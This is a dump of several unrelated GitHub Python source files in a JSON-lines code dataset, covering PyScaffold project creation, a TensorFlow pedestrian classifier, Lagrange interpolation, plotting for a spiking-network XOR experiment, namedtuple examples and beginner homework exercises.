\"\"\"\n actions = DEFAULT_ACTIONS\n\n # Activate the extensions\n return reduce(lambda acc, f: _activate(f, acc), extensions, actions)\n\n\ndef create_project(opts=None, **kwargs):\n \"\"\"Create the project's directory structure\n\n Args:\n opts (dict): options of the project\n **kwargs: extra options, passed as keyword arguments\n\n Valid options include:\n\n :Naming: - **project** (*str*)\n - **package** (*str*)\n\n :Package Information: - **author** (*str*)\n - **email** (*str*)\n - **release_date** (*str*)\n - **year** (*str*)\n - **title** (*str*)\n - **description** (*str*)\n - **url** (*str*)\n - **classifiers** (*str*)\n - **requirements** (*list*)\n\n :PyScaffold Control: - **update** (*bool*)\n - **force** (*bool*)\n - **pretend** (*bool*)\n - **extensions** (*list*)\n\n Some of these options are equivalent to the command line options, others\n are used for creating the basic python package meta information, but the\n last tree can change the way PyScaffold behaves.\n\n When the **force** flag is ``True``, existing files will be overwritten.\n When the **update** flag is ``True``, PyScaffold will consider that some\n files can be updated (usually the packaging boilerplate),\n but will keep others intact.\n When the **pretend** flag is ``True``, the project will not be\n created/updated, but the expected outcome will be logged.\n\n Finally, the **extensions** list may contain any function that follows the\n `extension API <../extensions>`_. Note that some PyScaffold features, such\n as travis, tox and pre-commit support, are implemented as built-in\n extensions. In order to use these features it is necessary to include the\n respective functions in the extension list. All built-in extensions are\n accessible via :mod:`pyscaffold.extensions` submodule, and use\n ``extend_project`` as naming convention::\n\n # Using built-in extensions\n from pyscaffold.extensions import pre_commit, travis, tox\n\n opts = { #...\n \"extensions\": [e.extend_project\n for e in pre_commit, travis, tox]}\n create_project(opts)\n\n Note that extensions may define extra options. For example, built-in\n cookiecutter extension define a ``cookiecutter_template`` option that\n should be the address to the git repository used as template.\n \"\"\"\n opts = opts if opts else {}\n opts.update(kwargs)\n\n actions = discover_actions(opts.get('extensions', []))\n\n # Call the actions\n return reduce(lambda acc, f: _invoke(f, *acc), actions, ({}, opts))\n\n\n# -------- Auxiliary functions --------\n\ndef _activate(extension, actions):\n \"\"\"Activate extension with proper logging.\"\"\"\n logger.report('activate', extension.__module__)\n with logger.indent():\n actions = extension(actions, helpers)\n\n return actions\n\n\ndef _invoke(action, struct, opts):\n \"\"\"Invoke action with proper logging.\"\"\"\n logger.report('invoke', helpers.get_id(action))\n with logger.indent():\n struct, opts = action(struct, opts)\n\n return (struct, opts)\n\n\ndef _verify_git():\n \"\"\"Check if git is installed and able to provide the required information.\n \"\"\"\n if not info.is_git_installed():\n raise GitNotInstalled\n if not info.is_git_configured():\n raise GitNotConfigured\n","repo_name":"hatef207/work_test01","sub_path":"lib/python2.7/site-packages/pyscaffold/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28764190877","text":"from PIL import Image\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n# from sklearn.model_selection import train_test_split\n\n# from sklearn import svm\nfrom SVM import SVM\n\n'''\nc=Image.open(\"img_00000.pgm\")\nprint(list(c.getdata()))\n'''\n# 4800\nlength1 = 200\n# 5000\nlength2 = 200\n\nlabels = []\n# images_data =[]\n\ntest_labels = []\n# images_test_data = []\nfeatures = []\n\nfor i in range(648):\n features.append(\"feat\" + str(i))\n\ndf1 = pd.DataFrame(columns=features)\ndf2 = pd.DataFrame(columns=features)\n# load_training_dataset\nfor i in range(1, 4):\n for j in range(length1): # 4800\n file_dir = '/ped_examples/'\n strr = (str(i) + file_dir)\n\n img = np.array(Image.open(strr + \"img_\" + \"{0:05}\".format(j) + \".pgm\"))\n img = img.flatten()\n df1.loc[j + ((i - 1) * length1)] = img\n # images_data=np.append(images_data, img)\n labels.append(1) # pedestrian\n\nfor i in range(1, 4):\n for j in range(length2): # 5000\n file_dir = '/non-ped_examples/'\n strr = (str(i) + file_dir)\n\n img = np.array(Image.open(strr + \"img_\" + \"{0:05}\".format(j) + \".pgm\"))\n img = img.flatten()\n df1.loc[j + ((i - 1) * length2 + (3 * length1))] = img\n # images_data=np.append(images_data, img)\n labels.append(0) # non-pedestrian\n\n# load_testing_dataset\nfor i in range(1, 3):\n for j in range(length1): # 4800\n file_dir = \"/ped_examples/\"\n strr = ('T' + str(i) + file_dir)\n\n img = np.array(Image.open(strr + \"img_\" + \"{0:05}\".format(j) + \".pgm\"))\n img = img.flatten()\n df2.loc[j + ((i - 1) * length1)] = img\n # images_test_data=np.append(images_test_data, img)\n test_labels.append(1) # pedestrian\n\n for j in range(length2): # 5000\n file_dir = \"/non-ped_examples/\"\n strr = ('T' + str(i) + file_dir)\n\n img = np.array(Image.open(strr + \"img_\" + \"{0:05}\".format(j) + \".pgm\"))\n img = img.flatten()\n df2.loc[j + ((i - 1) * length2 + (2 * length1))] = img\n # images_test_data=np.append(images_test_data, img)\n test_labels.append(0) # non-pedestrian\n\nprint(df1)\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(input_shape=(36, 18)),\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10, activation=tf.nn.softmax)\n])\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\ntrain = pd.read_csv('pedestrian.csv')\nX1 = train.drop('ped',axis=1).values\ny1 = train['ped'].values\n\ntest=pd.read_csv('test_pedestrian.csv')\nX2 = test.drop('ped',axis=1).values\ny2 = test['ped'].values\nmodel.fit(X1, y1, epochs=5)\nmodel.evaluate(X2, y2)\n\ndef cnn_model_fn(features, labels, mode):\n # Input Layer\n input_layer = tf.reshape(features[\"x\"], [-1, 28, 28, 1])\n\n # Convolutional Layer #1\n conv1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=32,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n\n # Pooling Layer #1\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)\n\n # Convolutional Layer #2 and Pooling Layer #2\n conv2 = tf.layers.conv2d(\n inputs=pool1,\n filters=64,\n kernel_size=[5, 5],\n padding=\"same\",\n activation=tf.nn.relu)\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)\n\n # Dense Layer\n pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 64])\n dense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits Layer\n logits = tf.layers.dense(inputs=dropout, units=10)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])\n }\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\ncnn_model_fn(X1,y1,tf.estimator.ModeKeys.TRAIN)\ncnn_model_fn(X1,y1,tf.estimator.ModeKeys.PREDICT)\n\n","repo_name":"Abudo-S/pedestrian","sub_path":"predestrain3.py","file_name":"predestrain3.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29413094130","text":"import matplotlib.pyplot as plt\nimport math\n\n# 给出一组数据进行lagrange插值,同时将结果用plot展现出来\ndef lagrange(x_,y,a):\n \"\"\"\n 获取拉格朗日插值\n :param x_: x的列表值\n :param y: y的列表值\n :param a: 需要插值的数\n :return: 返回插值结果\n \"\"\"\n ans = 0.0\n for i in range(len(y)):\n t_ = y[i]\n for j in range(len(y)):\n if i != j:\n t_ *= (a - x_[j] / (x_[i] - x_[j]))\n ans += t_\n return ans\n\ndef draw_picture(x_list,y_list,node):\n plt.title(\"lagrange\")\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n for i in range(len(x_list)):\n plt.scatter(x_list[i],y_list[i],color=\"purple\",linewidths=2)\n plt.scatter(node[0],node[1],color=\"blue\",linewidths=2)\n plt.show()\n\nif __name__ == '__main__':\n x = 0.54\n x_1 = [0.4, 0.5, 0.6, 0.7, 0.8]\n y_1 = [-0.9163, -0.6931, -0.5108, -0.3567, -0.2231]\n lagrange = lagrange(x_1,y_1,x)\n print(\"拉格朗日插值:{}\".format(lagrange))\n # 画图\n draw_picture(x_1, y_1, (x, lagrange))","repo_name":"IronmanJay/Python_Project","sub_path":"NumericalAnalysis/lagrange.py","file_name":"lagrange.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"37228205938","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.gridspec as gridspec\nimport sys\nsys.path.append('../')\nplt.style.use('../thesis_mplrc.dms')\nfrom utils_plotting import remove_xticklabel\nfrom utils_plotting import custom_colors\nfrom utils_plotting import set_axis_color\nimport raster_analysis as ra\n#from raster_analysis import add_step\nimport seaborn as sns\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-durex\", type=float, help=\"duration of example\")\nparser.add_argument(\"-alpha\", type=float, help=\"moving average time scale\")\nparser.add_argument(\"-numex\", type=int, help=\"number of training examples\")\nparser.add_argument(\"-numberofrealiz\", type=int, help=\"number of realization of the noise\", default=1)\n\nargs = parser.parse_args()\nnumber_of_realizations = args.numberofrealiz\n\n\n# import data\ndata_file_prefix = '../../data/xor-test/sym-ff/multiple-reals/xor-test.0.brate_'\ndatadir = '../../data/xor-test/sym-ff/multiple-reals/'\nfilenames_output = []\nfor i in range(1, number_of_realizations+1):\n filenames_output.append(data_file_prefix + 'output_seed'+str(i))\noutput_rates = np.loadtxt(data_file_prefix + 'output_seed1')\nhidden1_rates = np.loadtxt(data_file_prefix + 'hidden1_seed1')\nhidden2_rates = np.loadtxt(data_file_prefix + 'hidden2_seed1')\ninput1_rates = np.loadtxt(data_file_prefix + 'input1_seed1')\ninput2_rates = np.loadtxt(data_file_prefix + 'input2_seed1')\n#cost_epoch = np.loadtxt(datadir + 'cost_epoch.dat')\n\n\n# compute output rate\nbinSize = hidden1_rates[1,0] - hidden1_rates[0,0]\ntime_output, mean_output, std_output = ra.std_BRER_over_realizations(filenames_output, binsize=binSize)\n\n\n# define selected pre, during and post learning intervals\nafter_learning = [hidden1_rates.shape[0]-int(4*args.durex/binSize), hidden1_rates.shape[0]+1]\nbefore_learning = [int(3*args.alpha/binSize)+1, int(3*args.alpha/binSize)+int(4*args.durex/binSize)+1]\nduring_learning_interval = [3*args.alpha + args.numex//5*args.durex,\n 3*args.alpha + args.numex//5*args.durex + 4*args.durex]\nduring_learning = [int(during_learning_interval[0]/binSize) + 1,\n int(during_learning_interval[1]/binSize) + 1]\n\ner_trace = np.loadtxt(datadir + 'xor-test0.0.trevent_seed1')\nbr_trace = np.loadtxt(datadir + 'xor-test0.0.trburst_seed1')\nfor i in range(1,50):\n er_tmp = np.loadtxt(datadir + 'xor-test'+str(i)+'.0.trevent_seed1')\n br_tmp = np.loadtxt(datadir + 'xor-test'+str(i)+'.0.trburst_seed1')\n er_trace[:,1] += er_tmp[:,1]\n br_trace[:,1] += br_tmp[:,1]\ner_trace[:,1] /= 50.\nbr_trace[:,1] /= 50.\ner_trace = er_trace\nbr_trace = br_trace\n\ne_min = 2.\ne_max = 10.\ne_th = e_min + 0.5*(e_max - e_min)\n\n\n\nfig = plt.figure(figsize=(183/25.4, 4.5/7.5*183/25.4))\n# first subplot is empty\n\n# inputs\nax1 = fig.add_subplot(337)\nax1.plot(input1_rates[before_learning[0]:before_learning[1], 0],\n input1_rates[before_learning[0]:before_learning[1], 2],\n color=custom_colors['blue'], label='input 1')\nax1.plot(input2_rates[before_learning[0]:before_learning[1], 0],\n input2_rates[before_learning[0]:before_learning[1], 2], '-', lw=1, color=custom_colors['blue'], label='input 2')\nxtik = list(3*args.alpha + args.durex*np.arange(5))\nax1.text(xtik[0] + args.durex/2., -0.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax1.text(xtik[1] + args.durex/2., -0.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax1.text(xtik[2] + args.durex/2., -0.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax1.text(xtik[3] + args.durex/2., -0.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\nax1.set_ylabel('ER, input [Hz]')\nax1.set_ylim([0, 11])\n#ax1.set_title('Inputs for all examples', fontdict=None, loc='center', fontsize=9)\nax1.set_xticks(xtik)\nax1.set_yticks([0, 10])\nax1.spines['top'].set_visible(False)\nax1.spines['right'].set_visible(False)\nax1.legend(loc='best')\nremove_xticklabel(ax1)\n\n\n# output before/after\nax2 = fig.add_subplot(332)\nax2.plot(time_output[before_learning[0]:before_learning[1]],\n mean_output['ER'][before_learning[0]:before_learning[1]],\n linestyle='dashed', color=custom_colors['blue'], label='before')\nax2.fill_between(time_output[before_learning[0]:before_learning[1]],\n mean_output['ER'][before_learning[0]:before_learning[1]] - 2*std_output['ER'][before_learning[0]:before_learning[1]],\n mean_output['ER'][before_learning[0]:before_learning[1]] + 2*std_output['ER'][before_learning[0]:before_learning[1]],\n color=custom_colors['blue'], alpha=0.5, lw=0)\nax2.plot(time_output[before_learning[0]:before_learning[1]],\n mean_output['ER'][after_learning[0]:after_learning[1]],\n color=custom_colors['blue'], label='after')\nax2.fill_between(time_output[before_learning[0]:before_learning[1]],\n mean_output['ER'][after_learning[0]:after_learning[1]] - 2*std_output['ER'][after_learning[0]:after_learning[1]],\n mean_output['ER'][after_learning[0]:after_learning[1]] + 2*std_output['ER'][after_learning[0]:after_learning[1]],\n color=custom_colors['blue'], alpha=0.5, lw=0)\nax2.plot(time_output[before_learning[0]:before_learning[1]],\n e_th*np.ones(np.shape(mean_output['ER'][before_learning[0]:before_learning[1]])), 'k:', lw=0.5)\nax2.text(xtik[0] + args.durex/2., -0.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax2.text(xtik[1] + args.durex/2., -0.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax2.text(xtik[2] + args.durex/2., -0.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax2.text(xtik[3] + args.durex/2., -0.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\nax2.set_ylabel('ER, output [Hz]')\nax2.set_ylim([0, 11])\n#ax2.set_title('Output before/after learning', fontdict=None, loc='center', fontsize=9)\nax2.set_xticks(xtik)\nax2.set_yticks([0, 10])\nax2.spines['top'].set_visible(False)\nax2.spines['right'].set_visible(False)\nax2.legend(loc='best')\nremove_xticklabel(ax2)\n#set_axis_color(ax2, custom_colors['sky_blue'])\n\n\n# error generation at output layer\nax3 = fig.add_subplot(333)\nr_out = output_rates[during_learning[0]:during_learning[1], :]\nteacher = np.zeros(np.shape(r_out[:,2]))\ner_est = er_trace[during_learning[0]:during_learning[1], 1]/args.alpha\nxtik = list(during_learning_interval[0] + args.durex*np.arange(5))\n\nra.add_step(teacher, int(0.9*args.durex/binSize), int(0.1*args.durex/binSize)-1, -1./(e_max - er_est[int(0.9*args.durex/binSize)]))\nra.add_step(teacher, int(1.9*args.durex/binSize), int(0.1*args.durex/binSize)-1, 1./(er_est[int(1.9*args.durex/binSize)] - e_min))\nra.add_step(teacher, int(2.9*args.durex/binSize), int(0.1*args.durex/binSize)-1, 1./(er_est[int(2.9*args.durex/binSize)] - e_min))\nra.add_step(teacher, int(3.9*args.durex/binSize), int(0.1*args.durex/binSize)-1, -1./(e_max - er_est[int(3.9*args.durex/binSize)]))\n\nax3.plot(r_out[:, 0], 100*r_out[:, 1]/r_out[:, 2], color=custom_colors['red'])\nax3.text(xtik[0] + args.durex/2., -4.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax3.text(xtik[1] + args.durex/2., -4.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax3.text(xtik[2] + args.durex/2., -4.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax3.text(xtik[3] + args.durex/2., -4.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\n#ax3.set_title('Error generation at output layer', fontdict=None, loc='center', fontsize=9)\nremove_xticklabel(ax3)\n#set_axis_color(ax3, custom_colors['sky_blue'])\nax3.set_yticks([0, 45, 90])\nax3.set_ylabel('BP, output [%]', color=custom_colors['red'])\nax3.spines['top'].set_visible(False)\n\nax3_tw = ax3.twinx()\nax3_tw.plot(r_out[:, 0], teacher, '--', lw=1, color=custom_colors['pink'])\nax3_tw.set_xticks(xtik)\n#set_axis_color(ax3_tw, custom_colors['sky_blue'])\n#ax3_tw.set_ylim(ax3_tw.get_yticks()[0], ax3_tw.get_yticks()[-1])\nax3_tw.set_yticks([-0.4, 0, 0.4])\nax3_tw.set_ylabel('Teaching current [nA]', color=custom_colors['pink'])\nax3_tw.spines['top'].set_visible(False)\n\n\n# error propagation in hidden layers\nax4 = fig.add_subplot(335)\nr_hid1 = hidden1_rates[during_learning[0]:during_learning[1], :]\nr_out = output_rates[during_learning[0]:during_learning[1], :]\nBP = 100*r_hid1[:, 1]/r_hid1[:, 2]\nmin_BP = np.min(BP)\nmax_BP = np.max(BP)\nmin_current_dend = np.min(r_out[:,1])\nmax_current_dend = np.max(r_out[:,1])\nrescaled_BR = min_BP + (r_out[:,1] - min_current_dend)*(max_BP-min_BP)/(max_current_dend-min_current_dend)\nax4.plot(r_hid1[:, 0], BP, color=custom_colors['red'])\nax4.plot(r_out[:, 0], rescaled_BR, ':', color=custom_colors['orange'], label='output BR (rescaled)')\nax4.set_xticks(xtik)\nax4.set_yticks([0, 50])\nax4.set_ylim([0, 60])\nax4.set_ylabel('BP, hidden 1 [%]')\nax4.text(xtik[0] + args.durex/2., -2.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax4.text(xtik[1] + args.durex/2., -2.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax4.text(xtik[2] + args.durex/2., -2.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax4.text(xtik[3] + args.durex/2., -2.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\n#ax4.set_title('Error propagation to hidden 1', fontdict=None, loc='center', fontsize=9)\nax4.spines['top'].set_visible(False)\nax4.spines['right'].set_visible(False)\nax4.legend(loc='best')\nremove_xticklabel(ax4)\n#set_axis_color(ax4, custom_colors['bluish_green'])\n\n\nax5 = fig.add_subplot(336)\nr_hid2 = hidden2_rates[during_learning[0]:during_learning[1], :]\nBP = 100*r_hid2[:, 1]/r_hid2[:, 2]\nmin_BP = np.min(BP)\nmax_BP = np.max(BP)\nBR_out = -output_rates[during_learning[0]:during_learning[1], 1]\nmin_current_dend = np.min(BR_out)\nmax_current_dend = np.max(BR_out)\nrescaled_BR = min_BP + (BR_out - min_current_dend)*(max_BP-min_BP)/(max_current_dend-min_current_dend)\nax5.plot(r_hid2[:, 0], BP, color=custom_colors['red'])\nax5.plot(r_out[:, 0], rescaled_BR, ':', color=custom_colors['orange'], label='output BR (inverted & rescaled)')\n\nax5.set_xticks(list(during_learning[0]*binSize + args.durex*np.arange(5)-1))\nax5.set_yticks([0, 50])\nax5.set_ylim([0, 60])\nax5.set_ylabel('BP, hidden 2 [%]')\nax5.text(xtik[0] + args.durex/2., -2.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax5.text(xtik[1] + args.durex/2., -2.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax5.text(xtik[2] + args.durex/2., -2.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax5.text(xtik[3] + args.durex/2., -2.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\n#ax5.set_title('Error propagation to hidden 2', fontdict=None, loc='center', fontsize=9)\nax5.spines['top'].set_visible(False)\nax5.spines['right'].set_visible(False)\nax5.legend(loc='lower left')\nremove_xticklabel(ax5)\n#set_axis_color(ax5, custom_colors['bluish_green'])\n\n# hidden 1 before/after\nax6 = fig.add_subplot(338)\nax6.plot(hidden1_rates[before_learning[0]:before_learning[1], 0], hidden1_rates[before_learning[0]:before_learning[1], 2],\n linestyle='dashed', color=custom_colors['blue'], label='before')\nax6.plot(hidden1_rates[before_learning[0]+1:before_learning[1], 0], hidden1_rates[after_learning[0]+1:after_learning[1], 2],\n color=custom_colors['blue'], label='after')\nxtik = list(3*args.alpha + args.durex*np.arange(5))\nax6.text(xtik[0] + args.durex/2., -0.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax6.text(xtik[1] + args.durex/2., -0.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax6.text(xtik[2] + args.durex/2., -0.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax6.text(xtik[3] + args.durex/2., -0.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\nax6.set_ylabel('ER, hidden 1 [Hz]')\nax6.set_ylim([0, 11])\n#ax6.set_title('Hidden 1 before/after learning', fontdict=None, loc='center', fontsize=9)\nax6.set_xticks(xtik)\nax6.set_yticks([0, 10])\nax6.spines['top'].set_visible(False)\nax6.spines['right'].set_visible(False)\nax6.legend(loc='best')\nremove_xticklabel(ax6)\n#set_axis_color(ax6, custom_colors['bluish_green'])\n\n\n# hidden 2 before/after\nax7 = fig.add_subplot(339)\nax7.plot(hidden2_rates[before_learning[0]:before_learning[1], 0], hidden2_rates[before_learning[0]:before_learning[1], 2],\n linestyle='dashed', color=custom_colors['blue'], label='before')\nax7.plot(hidden2_rates[before_learning[0]+1:before_learning[1], 0], hidden2_rates[after_learning[0]+1:after_learning[1], 2],\n color=custom_colors['blue'], label='after')\nax7.text(xtik[0] + args.durex/2., -0.5, '(0, 0)', horizontalalignment='center', verticalalignment='top')\nax7.text(xtik[1] + args.durex/2., -0.5, '(1, 0)', horizontalalignment='center', verticalalignment='top')\nax7.text(xtik[2] + args.durex/2., -0.5, '(0, 1)', horizontalalignment='center', verticalalignment='top')\nax7.text(xtik[3] + args.durex/2., -0.5, '(1, 1)', horizontalalignment='center', verticalalignment='top')\nax7.set_ylabel('ER, hidden 2 [Hz]')\nax7.set_ylim([0, 11])\n#ax7.set_title('Hidden 2 before/after learning', fontdict=None, loc='center', fontsize=9)\nax7.set_xticks(xtik)\nax7.set_yticks([0, 10])\nax7.spines['top'].set_visible(False)\nax7.spines['right'].set_visible(False)\nax7.legend(loc='best')\nremove_xticklabel(ax7)\n#set_axis_color(ax7, custom_colors['bluish_green'])\n\n\nplt.tight_layout()\nplt.savefig('../../results/xor/XOR.pdf')\nplt.close()\n","repo_name":"apayeur/spikingburstprop","sub_path":"analysis/xor/plot_xor.py","file_name":"plot_xor.py","file_ext":"py","file_size_in_byte":13508,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"25331713285","text":"from collections import namedtuple\nSubscriber = namedtuple('Subscriber', ['addr', 'joined'])\nsub = Subscriber('abc@gmail.com', '2010-02-02')\nprint(sub)\nprint(sub.addr)\nprint(sub.joined)\n\n# Reference to positional elements often make the code a bit less expensive and more\n# dependent on the structure of the records. Here is a version that uses a namedtuple\nStock = namedtuple('Stock', ['name', 'shares', 'price'])\ndef compute_cost(records):\n total = 0.0\n for rec in records:\n s = Stock(*rec)\n total += s.shares * s.price\n return total\n\n# If you need to change any of the attributes, it can be done using the _replace() method\n# of a namedtuple instance, which makes an entirely new namedtuple with specified values\n# replaced\ns = Stock1('ACME', 100, 123.45)\ns = s._replace(shares=75)\nprint(s)\n\n# A subtle use of the _replace() method is that it can be a convenient way to populate\n# named tuples that have optional or missing field. To do this, you make a prototype\n# tuple containing the default values and then use _replace() to create new instances \n# with values replaced.\nStock2 = namedtuple('Stock', ['name', 'shares', 'price', 'date', 'time'])\n# Create a prototype instance\nstock_prototype = Stock('', 0, 0.0, None, None)\n# Function to convert a dictionary to a Stock\ndef dict_to_stock(s):\n return stock_prototype._replace(**s)\n\na = {'name': 'ACME', 'shares': 100, 'price': 123.45}\nprint(dict_to_stock(a))\nb = {'name': 'ACME', 'shares': 100, 'price': 123.45, 'date': '12/17/2012'}\nprint(dict_to_stock(b))","repo_name":"pujansoni/python","sub_path":"1_18_mapping_name_to_sequence_elements.py","file_name":"1_18_mapping_name_to_sequence_elements.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34002952431","text":"\"\"\"a =int(input())\r\nb = int(input())\r\nc = int(input())\r\nz = a+b+c\r\nx = z//2\r\nprint(x)\"\"\"\r\n\"\"\"\"n1 = int(input(\"Введите целое число: \"))\r\nn2 = 0\r\n\r\nwhile n1 > 0:\r\n digit = n1 % 10\r\n n1 = n1 // 10\r\n n2 = n2 * 10\r\n n2 = n2 + digit\r\n\r\nprint('', n2)\"\"\"\r\n#print(\" *** ***** *** *****\\n*\\t *\\t\\t *\\t *\\t *\\t *\\n* *** *\\t\\t*\\t\\t *\\t***\\t*\\t *\\n*\\t *\\t\\t*****\\t *\\t\\t*\\t * \")\r\n\r\n\"\"\"a =int(input())\r\nb = int(input())\r\nc = int(input())\r\nz = a+b+c\r\nx = z//2\r\nprint(x)\"\"\"\r\n#a = int(input())\r\n#b = int(input())\r\n#c = int(input())\r\n#print(a // 2 + b // 2 + c // 2 + a % 2 + b % 2 + c % 2)\r\n\"\"\"n1= int(input('введите ваше число' ))\r\nn= ('n1')\r\nn2 = ('n % 10 ')\r\nn3= ('n2 // 10')\r\nn4= (\"n3*10+n2*10+n\")\r\nprint( \"\" , n4)\"\"\"\r\n\"\"\"numb= int(input())\r\nnumb2 = ( numb // 10) #12\r\nnumb3 =(numb % 10) #3\r\nnumb4 = ( numb2 % 10) #2\r\nn0= (numb //100)\r\nn5=((numb3*10+numb4)*10+n0)\r\nprint(n5)\"\"\"\r\n\r\n\"\"\"n1 = int(input())\r\nn = 1\r\nwhile n ** 2 <= n1:\r\n print(n ** 2)\r\n n += 1 \"\"\"\r\n\r\n\"\"\"n= int(input(\"your number\"))\r\nn0=2\r\nn1=1\r\nwhile n0 <= n:\r\n n0 *= 2\r\n n1 +=1\r\n\r\n print(n1-1,n0//2)\"\"\"\r\n\"\"\"x=int(input())\r\ns=0\r\nwhile x!=0:\r\n x=int(input())\r\ns+=1\r\nprint(x)\"\"\"\r\n\r\n#задание 13\r\n#x= input(\"\")\r\n#print(x.count(\" \")+1)\r\n\r\n#задание 10\r\n#x=input(\"\")\r\n#x= x.replace(\"h\",\"H\",x.count(\"h\")-1).replace(\"H\",\"h\",1)\r\n#print(x)\r\n\r\n\r\n#задание 10\r\n\"\"\"str=input()\r\nprint(str[2])#a\r\nprint(str[-2])#b\r\nprint(str[0:5])#c\r\nprint(str[:-2])#d\r\nprint(str[::2])#e\r\nprint(str[1::2])#f\r\nprint(str[::-1])#g\r\nprint(str[::-2])#h\r\nprint(len(str)-1)#i \"\"\"\r\n\r\n\r\n\"\"\"inputVal = int(input())\r\ninputCount = 0\r\ninputSum = 0\r\ninputEven = 0\r\ninputOdd = 0\r\ninputMin = inputVal\r\ninputMax = inputVal\r\nwhile inputVal != 0:\r\n inputCount += 1\r\n inputSum += inputVal\r\n if inputMin > inputVal:\r\n inputMin = inputVal\r\n if inputVal > inputMax:\r\n inputMax = inputVal\r\n if inputVal % 2 == 0:\r\n inputEven += 1\r\n else:\r\n inputOdd += 1\r\n inputVal=int(input())\r\n\r\n\r\n\r\nprint( 'Count: {}'.format(inputCount))\r\nprint(\"Sum: {}\" . format(inputSum))\r\nprint(\"Average: {}\" . format(inputSum / inputCount))\r\nprint(\"min: {}\" .format(inputMin))\r\nprint(\"max: {}\". format(inputMax))\r\nprint(\"even: {}\".format(inputEven))\r\nprint(\"odd: {}\".format(inputOdd))\"\"\"\r\n\r\n\r\n#задание 16\r\nfrom random import randint\r\n\r\na=[randint(1,20) for _ in range(10)]\r\nprint(\", \".join( repr(e) for e in a))\r\nk = int(input())\r\nfor i in range(k + 1, len(a)):\r\n a[i - 1] = a[i]\r\na.pop()\r\nprint(', '.join([str(i) for i in a]))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"scope7336/hillel_world_python","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69978462974","text":"import os\nimport gzip\nimport math\nimport pickle\nimport numpy as np\nimport urllib.request\nfrom PIL import Image\nfrom skimage import transform\nimport matplotlib.pyplot as plt\nimport concurrent.futures as cf\n\n\n \n\n\ndef dataloader(X, y, BATCH_SIZE):\n \"\"\"\n Returns a data generator.\n\n Parameters:\n - X: dataset examples.\n - y: ground truth labels.\n \"\"\"\n n = len(X)\n for t in range(0, n, BATCH_SIZE):\n yield X[t:t+BATCH_SIZE, ...], 